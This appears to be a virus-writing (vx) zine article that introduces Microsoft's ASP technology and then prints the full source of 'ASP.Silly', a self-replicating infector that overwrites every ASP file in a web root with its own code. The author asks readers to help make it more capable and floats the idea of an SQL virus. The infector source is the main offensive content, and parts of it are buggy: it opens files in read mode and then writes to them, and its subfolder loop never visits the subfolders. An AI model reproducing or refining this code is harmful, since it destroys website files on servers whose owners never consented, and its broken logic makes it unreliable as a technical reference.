ìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄì ÄìÄìÄì Little bit about ASP Virus ÄìÄìÄì ìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄì I. Introduction II. What is ASP III. Which platform support ASP Iv. What you need to test your ASP V. ASP Anatomy VI. Can we write virus in ASP ? VII. ASP.Silly ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ I. INTRODUCTION ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Hello PPL,This time I would to talk litle bit about ASP,But I think it just litle bit Coz I didn't found many documentation,when I looking for something about ASP,Specialy in ASP's Virus.So this is just litle bit Information about ASP that I would to share with you.If you know much about ASP and better than me , Sure please mail me , coz I want to learn it more.Ok it's enaugh,lets start ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ II. What is ASP ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Before we go on with ASP,it will be better if you know what is ASP,What it's function and what it's bennefit,of course That will help you get some litle bit imagination about ASP. ASP is one of technology which developed by Microsoft in 1996.ASP(Active Server Pages) is Microsoft's server-side scripting,Yeah it's server side scripting language. ASP is Internet framework,you can use it to make your web dinamic.And Now , Many application used by ASP is ASP'S aplication that correlate with DataBase(Acces ,SQL Oracle etc). And Scripting language that most using in ASP is VBScript.Not only VBScript,ASP also support Java,Js, or any dotnet lang,But I don't need to talk much about it. Is ASP's Security Save enough ? Because ASP is one of IIS's Component, so I think ASP has an same level security with Windows NT and Win 2000. ASP's Files in web server can protected with any protection's level. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ III. What platform support ASP? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ For the first time,ASP is developed by Windows and it's components,But Now I got Some Information that in the last range of time,there is some Software development made server application for ASP that can work in different platform except Windows, Now ASP can work under Linux Solaris, Etc.One of the vendor is Chili!Soft.Inc ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Iv. What you need to test your ASP ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ You need to make your PC as an server if you want to test your ASP Script,and the Editor? Hah.. I just use Notepad for the Editor. I use Personal web server / PWS (Microsoft) for win 9x & Me as the server,that instaled in My PC and work under Win9x So in this session all of codes that I gave for Example is using PWS'S path.I hope you understand what I mean. :-) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ V. ASP Anatomy ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Acctualy ASP's page can be associated in three Component : 1. ASP Objects ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ In fact,ASP is an Object equally Model object component(COM).ASP is not language which often we hear. ASP is developing with ISAPI's base. ASP only consisting of six very simple object . but because ASP coupled with the other's Microsoft technological structure, so this object become very good. The six objects is : Application,Session,Response,Request,Server and ObjectContent 2. Scripting Language ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ In Scripting language,This is ASP's Objects which manipulated according to our desire. Scripting language that given from Microsoft is VBScript and JavaScript,Both of them can be use for writing in ASP.But Now, there is PerlScript too. You must give the identity in the begining of your ASP, Example : <%@LANGUAGE=Your_Scripting_Language%> 3. ActiveX Server Component ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ASP object only a link between Html page with program that exist in the server.scripting Ianguage used to make needed logic path.And to acces other programs and database we need activeX server component.ActiveX server component used in ASP, For Example : Set ObjCon = Server.CreateObject("ADODB.Connection") With 3 component above one ASP's page can run any complex programs in server.That is the bennefit when we use ASP. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ VI. Can we write virus in ASP ? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ I have tried to write some ASP's virus,But I think ASP is not very friendly with it.I have many problem when code in it.For example,In ASP, I can't read independent path file when it executed in the server. Yeah I also have tried configure it with VBScript/Js,But it didn't give me much help. This is very sily and very simple ASP infector that will overwrite all ASP file in current directory,I use PWS so the root is "C:\Inetpub\wwwroot" lets check it : ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ASP.Silly ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ <html><head><title>ASP.Silly</title> <body>ASP.Silly<br>This is very silly ASP Infector By Psychologic<br> <% Set fso = Server.CreateObject("Scripting.FileSystemObject") Set Drives=fso.drives a = Server.mappath("silly.asp") Set dropper = Fso.opentextfile(a) src = dropper.readall dropper.close Set Folder=fso.getfolder("C:\InetPub\wwwRoot") Set Files = folder.files For Each File in files If fso.GetExtensionName(file.path)="asp" then on error resume next set droper = fso.opentextfile(file.path,1) droper.write src droper.close end If Next Set Subfolders = folder.SubFolders For Each Subfolder in Subfolders If fso.GetExtensionName(file.path)="asp" then on error resume next set droper = fso.opentextfile(file.path,1) droper.write src droper.close end If Next %> </body></html> ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ASP.Silly ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Server.mappath is the directory path in the server(In my pc is C:\inetpub\wwwroot) and the silly.asp is the asp infector code. You see, I think There no much I can do with ASP, cos what ? You see codes above? Yeah I can't read independent path of the virus code. See : a = Server.mappath("silly.asp") Silly.asp is our main code but we can't read it path independetly I've try To configure it like this : a = Server.mappath("Wscript.Scriptfullname") But it didn't work well, soo ?? I don't know how to fix this problem , If you know how Please mail me :-) If this problem can be fixed I think There is many thing that we can code in ASP since we know ASP has many activeX object components, and maybe DataBase Injection(for ex : SQL Virus) can be improved too. Ok thats all, Mail me if you know how to clear this problem :-) ìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄì Psychologic on Jakarta.Indonesia Äì Greetz for nice vx guys [AntiAlphabethicalOrder] : Äì Spth + Dia + Mistre.Toro + Blueowl + Methic + Skulls + Cyneox + Philie + Int3 Äì ìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄìÄì